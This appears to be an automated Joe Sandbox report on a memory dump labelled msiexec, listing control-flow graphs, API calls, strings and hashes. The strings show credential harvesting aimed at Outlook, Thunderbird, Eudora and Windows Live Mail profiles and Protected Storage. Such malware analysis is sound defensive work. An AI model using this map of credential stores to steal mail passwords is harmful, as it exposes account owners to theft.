__fprintf_l 34057 4244e6 19 API calls 34059 42e8e8 127 API calls __fprintf_l 34060 4118ee RtlLeaveCriticalSection 34246 43f6ec 22 API calls 34062 425115 119 API calls __fprintf_l 34063 410cf3 EnumResourceNamesA 34249 4492f0 memcpy memcpy 34251 43fafa 18 API calls 34253 4342f9 15 API calls __fprintf_l 34064 4144fd 19 API calls 34255 4016fd NtdllDefWindowProc_A ??2@YAPAXI memset memcpy ??3@YAXPAX 34256 40b2fe LoadIconA LoadIconA SendMessageA SendMessageA SendMessageA 34259 443a84 _mbscpy 34261 43f681 17 API calls 34067 404487 22 API calls 34263 415e8c 16 API calls __fprintf_l 34071 411893 RtlDeleteCriticalSection __fprintf_l 34072 41a492 42 API calls 34267 403e96 34 API calls 34268 410e98 memset SHGetPathFromIDList SendMessageA 34074 426741 109 API calls __fprintf_l 34075 4344a2 18 API calls 34076 4094a2 10 API calls 34271 4116a6 15 API calls __fprintf_l 34272 43f6a4 17 API calls 34273 440aa3 20 API calls 34275 427430 45 API calls 34079 4090b0 7 API calls 34080 4148b0 15 API calls 34082 4118b4 RtlEnterCriticalSection 34083 4014b7 CreateWindowExA 34084 40c8b8 19 API calls 34086 4118bf RtlTryEnterCriticalSection 34280 42434a 18 API calls __fprintf_l 34282 405f53 12 API calls 34094 43f956 59 API calls 34096 40955a 17 API calls 34097 428561 36 API calls 34098 409164 7 API calls 34286 404366 19 API calls 34290 40176c ExitProcess 34293 410777 42 API calls 34103 40dd7b 51 API calls 34104 425d7c 16 API calls __fprintf_l 34295 43f6f0 25 API calls 34296 42db01 22 API calls 34105 412905 15 API calls __fprintf_l 34297 403b04 54 API calls 34298 405f04 SetDlgItemTextA GetDlgItemTextA 34299 44b301 ??3@YAXPAX 34302 4120ea 14 API calls 3 library calls 34303 40bb0a 8 API calls 34305 413f11 strcmp 34109 434110 17 API calls __fprintf_l 34112 425115 108 API calls __fprintf_l 34306 444b11 _onexit 34114 425115 76 API calls __fprintf_l 34117 429d19 10 API calls 34309 444b1f __dllonexit 34310 409f20 _strcmpi 34119 42b927 31 API calls 34313 433f26 19 API calls __fprintf_l 34314 44b323 FreeLibrary 34315 427f25 46 API calls 34316 43ff2b 17 API calls 34317 43fb30 19 API calls 34126 414d36 16 API calls 34128 40ad38 7 API calls 34319 433b38 16 API calls __fprintf_l 33997 44b33b 33998 44b344 ??3@YAXPAX 33997->33998 33999 44b34b 33997->33999 33998->33999 34000 44b354 ??3@YAXPAX 33999->34000 34001 44b35b 33999->34001 34000->34001 34002 44b364 ??3@YAXPAX 34001->34002 34003 44b36b 34001->34003 34002->34003 34004 44b374 ??3@YAXPAX 34003->34004 34005 44b37b 34003->34005 34004->34005 34132 426741 21 API calls 34133 40c5c3 123 API calls 34135 43fdc5 17 API calls 34320 4117c8 InterlockedCompareExchange RtlInitializeCriticalSection 34138 4161cb memcpy memcpy memcpy memcpy 34325 43ffc8 18 API calls 34139 4281cc 15 API calls __fprintf_l 34327 4383cc 110 API calls __fprintf_l 34140 4275d3 41 API calls 34328 4153d3 22 API calls __fprintf_l 34141 444dd7 _XcptFilter 34333 4013de 15 API calls 34335 425115 111 API calls __fprintf_l 34336 43f7db 18 API calls 34339 410be6 WritePrivateProfileStringA GetPrivateProfileStringA 34143 4335ee 16 API calls __fprintf_l 34341 429fef 11 API calls 34144 444deb _exit _c_exit 34342 40bbf0 133 API calls 34147 425115 79 API calls __fprintf_l 34346 437ffa 22 API calls 34151 4021ff 14 API calls 34152 43f5fc 149 API calls 34347 40e381 9 API calls 34154 405983 40 API calls 34155 42b186 27 API calls __fprintf_l 34156 427d86 76 API calls 34157 403585 20 API calls 34159 42e58e 18 API calls __fprintf_l 34162 425115 75 API calls __fprintf_l 34164 401592 8 API calls 33200 410b92 33203 410a6b 33200->33203 33202 410bb2 33204 410a77 33203->33204 33205 410a89 GetPrivateProfileIntA 33203->33205 33208 410983 memset _itoa WritePrivateProfileStringA 33204->33208 33205->33202 33207 410a84 33207->33202 33208->33207 34351 434395 16 API calls 34166 441d9c memcmp 34353 43f79b 119 API calls 34167 40c599 42 API calls 34354 426741 87 API calls 34171 4401a6 21 API calls 34173 426da6 memcpy memset memset memcpy 34174 4335a5 15 API calls 34176 4299ab memset memset memcpy memset memset 34177 40b1ab 8 API calls 34359 425115 76 API calls __fprintf_l 34363 4113b2 18 API calls 2 library calls 34367 40a3b8 memset sprintf SendMessageA 33209 410bbc 33212 4109cf 33209->33212 33213 4109dc 33212->33213 33214 410a23 memset GetPrivateProfileStringA 33213->33214 33215 4109ea memset 33213->33215 33220 407646 strlen 33214->33220 33225 4075cd sprintf memcpy 33215->33225 33218 410a65 33219 410a0c WritePrivateProfileStringA 33219->33218 33221 40765a 33220->33221 33223 40765c 33220->33223 33221->33218 33222 4076a3 33222->33218 33223->33222 33226 40737c strtoul 33223->33226 33225->33219 33226->33223 34179 40b5bf memset memset _mbsicmp

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 129 4082cd-40841a memset * 4 GetComputerNameA GetUserNameA MultiByteToWideChar * 2 strlen * 2 memcpy 130 408450-408453 129->130 131 40841c 129->131 133 408484-408488 130->133 134 408455-40845e 130->134 132 408422-40842b 131->132 137 408432-40844e 132->137 138 40842d-408431 132->138 135 408460-408464 134->135 136 408465-408482 134->136 135->136 136->133 136->134 137->130 137->132 138->137
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 0040832F
                                                                                            • memset.MSVCRT ref: 00408343
                                                                                            • memset.MSVCRT ref: 0040835F
                                                                                            • memset.MSVCRT ref: 00408376
                                                                                            • GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                                                            • GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                                                            • strlen.MSVCRT ref: 004083E9
                                                                                            • strlen.MSVCRT ref: 004083F8
                                                                                            • memcpy.MSVCRT(?,000000A3,00000010,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040840A
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000B.00000002.2864120146.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                                                                                            • String ID: 5$H$O$b$i$}$}
                                                                                            • API String ID: 1832431107-3760989150
                                                                                            • Opcode ID: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
                                                                                            • Instruction ID: 30108760c83c1dc53a9521f9e33a2a4701cfdd5ab922e7e2e5f0797d9ff7fddf
                                                                                            • Opcode Fuzzy Hash: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
                                                                                            • Instruction Fuzzy Hash: BC51F67180029DAEDB11CFA4CC81BEEBBBCEF49314F0441AAE555E7182D7389B45CB65

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 335 407ef8-407f01 336 407f03-407f22 FindFirstFileA 335->336 337 407f24-407f38 FindNextFileA 335->337 338 407f3f-407f44 336->338 339 407f46-407f74 strlen * 2 337->339 340 407f3a call 407f90 337->340 338->339 342 407f89-407f8f 338->342 343 407f83 339->343 344 407f76-407f81 call 4070e3 339->344 340->338 346 407f86-407f88 343->346 344->346 346->342
                                                                                            APIs
                                                                                            • FindFirstFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F0E
                                                                                            • FindNextFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F2C
                                                                                            • strlen.MSVCRT ref: 00407F5C
                                                                                            • strlen.MSVCRT ref: 00407F64
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000B.00000002.2864120146.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileFindstrlen$FirstNext
                                                                                            • String ID: ACD
                                                                                            • API String ID: 379999529-620537770
                                                                                            • Opcode ID: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
                                                                                            • Instruction ID: 71029bc486f6697817f6bb289966da7394398bd7116df025ae0cbd4ece6cffc9
                                                                                            • Opcode Fuzzy Hash: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
                                                                                            • Instruction Fuzzy Hash: 581170769092029FD354DB34D884ADBB3D8DB45725F100A2FF459D21D1EB38B9408B5A

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 00401E8B
                                                                                            • strlen.MSVCRT ref: 00401EA4
                                                                                            • strlen.MSVCRT ref: 00401EB2
                                                                                            • strlen.MSVCRT ref: 00401EF8
                                                                                            • strlen.MSVCRT ref: 00401F06
                                                                                            • memset.MSVCRT ref: 00401FB1
                                                                                            • atoi.MSVCRT(?), ref: 00401FE0
                                                                                            • memset.MSVCRT ref: 00402003
                                                                                            • sprintf.MSVCRT ref: 00402030
                                                                                            • memset.MSVCRT ref: 00402086
                                                                                            • memset.MSVCRT ref: 0040209B
                                                                                            • strlen.MSVCRT ref: 004020A1
                                                                                            • strlen.MSVCRT ref: 004020AF
                                                                                            • strlen.MSVCRT ref: 004020E2
                                                                                            • strlen.MSVCRT ref: 004020F0
                                                                                            • memset.MSVCRT ref: 00402018
                                                                                              • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                              • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                                            • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104), ref: 0040219C
                                                                                              • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                                                            • _mbscpy.MSVCRT(?,00000000), ref: 00402177
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000B.00000002.2864120146.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: strlen$memset$_mbscpy$AttributesEnvironmentExpandFileStrings_mbscatatoisprintf
                                                                                            • String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll
                                                                                            • API String ID: 3833278029-4223776976
                                                                                            • Opcode ID: 22bf87547929d6464d555c30866af4eff336c20ded2a6a53d3974d6186b3e924
                                                                                            • Instruction ID: 9c65708a615aa9161e76439fb3ec4404e3c7586a7422c94cf2faf2b42662f59f
                                                                                            • Opcode Fuzzy Hash: 22bf87547929d6464d555c30866af4eff336c20ded2a6a53d3974d6186b3e924
                                                                                            • Instruction Fuzzy Hash: 2291193290515D6AEB21D6618C86FDE77AC9F58304F1400FBF508F2182EB78EB858B6D

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                              • Part of subcall function 00404A99: LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB8
                                                                                              • Part of subcall function 00404A99: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                                                                              • Part of subcall function 00404A99: FreeLibrary.KERNEL32(00000000), ref: 00404ADE
                                                                                              • Part of subcall function 00404A99: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040D190
                                                                                            • DeleteObject.GDI32(?), ref: 0040D1A6
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000B.00000002.2864120146.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
                                                                                            • String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !
                                                                                            • API String ID: 745651260-375988210
                                                                                            • Opcode ID: 01abe85119e862d03ebbcbf30b96c63784c41f31500a9bb9b68e18ec68e211b7
                                                                                            • Instruction ID: dea5423bbc6b84474d5379bd8edfb36e55d4f41410ab6b686afcfd17116e90de
                                                                                            • Opcode Fuzzy Hash: 01abe85119e862d03ebbcbf30b96c63784c41f31500a9bb9b68e18ec68e211b7
                                                                                            • Instruction Fuzzy Hash: 0A61AF71908345EBD7609FA1EC89A9FB7E8FF85704F00093FF544A21A1DB789805CB5A

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                              • Part of subcall function 004107F1: FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                                                                                            • LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00403C35
                                                                                            • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C4A
                                                                                            • _mbscpy.MSVCRT(?,?), ref: 00403E54
                                                                                            Strings
                                                                                            • www.google.com:443/Please log in to your Google Account, xrefs: 00403CA4
                                                                                            • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CD6
                                                                                            • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403CFB
                                                                                            • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D42
                                                                                            • www.google.com:443/Please log in to your Gmail account, xrefs: 00403C90
                                                                                            • PStoreCreateInstance, xrefs: 00403C44
                                                                                            • Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D3B
                                                                                            • Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D6E
                                                                                            • www.google.com/Please log in to your Gmail account, xrefs: 00403C86
                                                                                            • pstorec.dll, xrefs: 00403C30
                                                                                            • Software\Microsoft\Office\16.0\Outlook\Profiles, xrefs: 00403DA4
                                                                                            • www.google.com/Please log in to your Google Account, xrefs: 00403C9A
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000B.00000002.2864120146.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: Library$AddressFreeLoadProc_mbscpy
                                                                                            • String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\16.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
                                                                                            • API String ID: 1197458902-317895162
                                                                                            • Opcode ID: d1d1a1f093fb0983e81b65a453c5b2aa4e35261ad02c39a564d79f1cb6208b2a
                                                                                            • Instruction ID: f12475a9e901df39a06d2b9041e3ab5decda6d4897279b708da5bb949cd86342
                                                                                            • Opcode Fuzzy Hash: d1d1a1f093fb0983e81b65a453c5b2aa4e35261ad02c39a564d79f1cb6208b2a
                                                                                            • Instruction Fuzzy Hash: 7C51C971600201B6E714EF71CD86FDAB66CAF01709F14013FF915B61C2DBBDA658C699

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 231 444c4a-444c66 call 444e38 GetModuleHandleA 234 444c87-444c8a 231->234 235 444c68-444c73 231->235 237 444cb3-444d00 __set_app_type __p__fmode __p__commode call 444e34 234->237 235->234 236 444c75-444c7e 235->236 239 444c80-444c85 236->239 240 444c9f-444ca3 236->240 245 444d02-444d0d __setusermatherr 237->245 246 444d0e-444d68 call 444e22 _initterm __getmainargs _initterm 237->246 239->234 243 444c8c-444c93 239->243 240->234 241 444ca5-444ca7 240->241 244 444cad-444cb0 241->244 243->234 247 444c95-444c9d 243->247 244->237 245->246 250 444da4-444da7 246->250 251 444d6a-444d72 246->251 247->244 252 444d81-444d85 250->252 253 444da9-444dad 250->253 254 444d74-444d76 251->254 255 444d78-444d7b 251->255 257 444d87-444d89 252->257 258 444d8b-444d9c GetStartupInfoA 252->258 253->250 254->251 254->255 255->252 256 444d7d-444d7e 255->256 256->252 257->256 257->258 259 444d9e-444da2 258->259 260 444daf-444db1 258->260 261 444db2-444dc6 GetModuleHandleA call 40cf44 259->261 260->261 264 444dcf-444e0f _cexit call 444e71 261->264 265 444dc8-444dc9 exit 261->265 265->264
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000B.00000002.2864120146.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                                                                            • String ID: k:v
                                                                                            • API String ID: 3662548030-4078055367
                                                                                            • Opcode ID: 9c755aa49fdaa1e5b2c5d218946d9d177827adcc7bb206d52ece5a70cef5ea37
                                                                                            • Instruction ID: dd0826a03bb44e9375613df7343647c7563f031d366e42a412bc6d4d3743f318
                                                                                            • Opcode Fuzzy Hash: 9c755aa49fdaa1e5b2c5d218946d9d177827adcc7bb206d52ece5a70cef5ea37
                                                                                            • Instruction Fuzzy Hash: AF41A0B0C02344DFEB619FA4D8847AD7BB8FB49325F28413BE451A7291D7388982CB5D

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 0044430B
                                                                                              • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075A0
                                                                                              • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075AB
                                                                                              • Part of subcall function 0040759E: _mbscat.MSVCRT ref: 004075C2
                                                                                              • Part of subcall function 00410DBB: memset.MSVCRT ref: 00410E10
                                                                                              • Part of subcall function 00410DBB: _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                                                                            • memset.MSVCRT ref: 00444379
                                                                                            • memset.MSVCRT ref: 00444394
                                                                                            • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 004443CD
                                                                                            • strlen.MSVCRT ref: 004443DB
                                                                                            • _strcmpi.MSVCRT ref: 00444401
                                                                                            Strings
                                                                                            • \Microsoft\Windows Mail, xrefs: 00444329
                                                                                            • Store Root, xrefs: 004443A5
                                                                                            • Software\Microsoft\Windows Live Mail, xrefs: 004443AA
                                                                                            • \Microsoft\Windows Live Mail, xrefs: 00444350
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000B.00000002.2864120146.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset$strlen$EnvironmentExpandStrings_mbscat_mbscpy_strcmpi
                                                                                            • String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
                                                                                            • API String ID: 3203569119-2578778931
                                                                                            • Opcode ID: 273af5b117a68215158004e23a68f38449220407a2e325f643dbca173f5fc703
                                                                                            • Instruction ID: c969096c6c8075cae9da81fbffcb27ba025b1fc1210c9b39c3855a2ab2b3ab2e
                                                                                            • Opcode Fuzzy Hash: 273af5b117a68215158004e23a68f38449220407a2e325f643dbca173f5fc703
                                                                                            • Instruction Fuzzy Hash: A73197725083446BE320EA99DC47FCBB7DC9B85315F14441FF64897182D678E548877A

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 290 40ccd7-40cd06 ??2@YAPAXI@Z 291 40cd08-40cd0d 290->291 292 40cd0f 290->292 293 40cd11-40cd24 ??2@YAPAXI@Z 291->293 292->293 294 40cd26-40cd2d call 404025 293->294 295 40cd2f 293->295 297 40cd31-40cd57 294->297 295->297 299 40cd66-40cdd9 call 407088 call 4019b5 memset LoadIconA call 4019b5 _mbscpy 297->299 300 40cd59-40cd60 DeleteObject 297->300 300->299
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000B.00000002.2864120146.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??2@$DeleteIconLoadObject_mbscpymemset
                                                                                            • String ID:
                                                                                            • API String ID: 2054149589-0
                                                                                            • Opcode ID: dbced873dea8b6f5d2abe1eeb19a5d79894199d53c97d45454c9f74d68e3b887
                                                                                            • Instruction ID: e49e2262ea613e2b532621416bf92f05b9d60d1a181aada648b692035ce2a44d
                                                                                            • Opcode Fuzzy Hash: dbced873dea8b6f5d2abe1eeb19a5d79894199d53c97d45454c9f74d68e3b887
                                                                                            • Instruction Fuzzy Hash: C921A1B0900360DBDB10DF749DC97897BA8EB40B04F1405BBED08FF286D7B895408BA8

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 307 40ba28-40ba3a 308 40ba87-40ba9b call 406c62 307->308 309 40ba3c-40ba52 call 407e20 _mbsicmp 307->309 331 40ba9d call 4107f1 308->331 332 40ba9d call 404734 308->332 333 40ba9d call 404785 308->333 334 40ba9d call 403c16 308->334 314 40ba54-40ba6d call 407e20 309->314 315 40ba7b-40ba85 309->315 320 40ba74 314->320 321 40ba6f-40ba72 314->321 315->308 315->309 316 40baa0-40bab3 call 407e30 324 40bab5-40bac1 316->324 325 40bafa-40bb09 SetCursor 316->325 323 40ba75-40ba76 call 40b5e5 320->323 321->323 323->315 327 40bac3-40bace 324->327 328 40bad8-40baf7 qsort 324->328 327->328 328->325 331->316 332->316 333->316 334->316
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000B.00000002.2864120146.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: Cursor_mbsicmpqsort
                                                                                            • String ID: /nosort$/sort
                                                                                            • API String ID: 882979914-1578091866
                                                                                            • Opcode ID: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
                                                                                            • Instruction ID: 8a1fc52e493d51bfa0df36ad286e8752cb28bf69c391dd95ac0f49afa8242728
                                                                                            • Opcode Fuzzy Hash: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
                                                                                            • Instruction Fuzzy Hash: 2D2192B1704601EFD719AF75C880A69B7A9FF48318B10027EF419A7291CB39BC12CBD9

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 004109F7
                                                                                              • Part of subcall function 004075CD: sprintf.MSVCRT ref: 00407605
                                                                                              • Part of subcall function 004075CD: memcpy.MSVCRT(?,00000000,00000003,00000000,%2.2X ,?), ref: 00407618
                                                                                            • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00410A1B
                                                                                            • memset.MSVCRT ref: 00410A32
                                                                                            • GetPrivateProfileStringA.KERNEL32(?,?,0044C52F,?,00002000,?), ref: 00410A50
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000B.00000002.2864120146.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: PrivateProfileStringmemset$Writememcpysprintf
                                                                                            • String ID:
                                                                                            • API String ID: 3143880245-0
                                                                                            • Opcode ID: 06440367014e030cd30049a245fb0cc3fb8be964b179c0619a4e1c6a0770dea7
                                                                                            • Instruction ID: 950c872411b2f2d44c5e3370b52dcf3132a88c3cdc41bb294f16927293e6b240
                                                                                            • Opcode Fuzzy Hash: 06440367014e030cd30049a245fb0cc3fb8be964b179c0619a4e1c6a0770dea7
                                                                                            • Instruction Fuzzy Hash: A401A172804319BBEF119F50DC86EDB7B7CEF05344F0000A6F604A2052E635AA64CBA9

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 358 44b33b-44b342 359 44b344-44b34a ??3@YAXPAX@Z 358->359 360 44b34b-44b352 358->360 359->360 361 44b354-44b35a ??3@YAXPAX@Z 360->361 362 44b35b-44b362 360->362 361->362 363 44b364-44b36a ??3@YAXPAX@Z 362->363 364 44b36b-44b372 362->364 363->364 365 44b374-44b37a ??3@YAXPAX@Z 364->365 366 44b37b 364->366 365->366
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000B.00000002.2864120146.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??3@
                                                                                            • String ID:
                                                                                            • API String ID: 613200358-0
                                                                                            • Opcode ID: 0ad1635ea08d581da3d46e9cfe4a801b3f478eb4f35f0f6f88290fc2b5bda708
                                                                                            • Instruction ID: 5841ab7dcc50b440abd9236b7832042a9d7d1d7b8957bb774bcacf87f05c1f29
                                                                                            • Opcode Fuzzy Hash: 0ad1635ea08d581da3d46e9cfe4a801b3f478eb4f35f0f6f88290fc2b5bda708
                                                                                            • Instruction Fuzzy Hash: AAE046A134974456BA10AF7BAC52F13239CEA803523168C6FB800F36D2EF2CE890846C

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 367 410dbb-410dd2 call 410d0e 370 410dd4-410ddd call 4070ae 367->370 371 410dfd-410e1b memset 367->371 378 410ddf-410de2 370->378 379 410dee-410df1 370->379 372 410e27-410e35 371->372 373 410e1d-410e20 371->373 376 410e45-410e4f call 410a9c 372->376 373->372 375 410e22-410e25 373->375 375->372 380 410e37-410e40 375->380 386 410e51-410e76 call 410d3d call 410add 376->386 387 410e7f-410e92 _mbscpy 376->387 378->371 382 410de4-410de7 378->382 385 410df8 379->385 380->376 382->371 384 410de9-410dec 382->384 384->371 384->379 388 410e95-410e97 385->388 386->387 387->388
                                                                                            APIs
                                                                                              • Part of subcall function 00410D0E: LoadLibraryA.KERNEL32(shell32.dll,00410DCA,00000104), ref: 00410D1C
                                                                                              • Part of subcall function 00410D0E: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00410D31
                                                                                            • memset.MSVCRT ref: 00410E10
                                                                                            • _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                                                                              • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                                                                            Strings
                                                                                            • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00410E2B, 00410E3B
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000B.00000002.2864120146.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressLibraryLoadProcVersion_mbscpymemset
                                                                                            • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                            • API String ID: 119022999-2036018995
                                                                                            • Opcode ID: ed5743d336984a8c18282994424b44d0bcfcd120d49097e0ee850cbc5c972bb8
                                                                                            • Instruction ID: 345612a4203e2947e26158410096d7c3d27216bde768142914c78e2e12d87323
                                                                                            • Opcode Fuzzy Hash: ed5743d336984a8c18282994424b44d0bcfcd120d49097e0ee850cbc5c972bb8
                                                                                            • Instruction Fuzzy Hash: 89110D71C40318EBEB20B6D59C86EEF77ACDB14304F1404A7F555A2112E7BC9ED8C69A

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 393 4085d2-408605 call 44b090 call 4082cd call 410a9c 400 4086d8-4086dd 393->400 401 40860b-40863d memset call 410b62 393->401 404 4086c7-4086cc 401->404 405 408642-40865a call 410a9c 404->405 406 4086d2 404->406 409 4086b1-4086c2 call 410b62 405->409 410 40865c-4086ab memset call 410add call 40848b 405->410 406->400 409->404 410->409
                                                                                            APIs
                                                                                              • Part of subcall function 004082CD: memset.MSVCRT ref: 0040832F
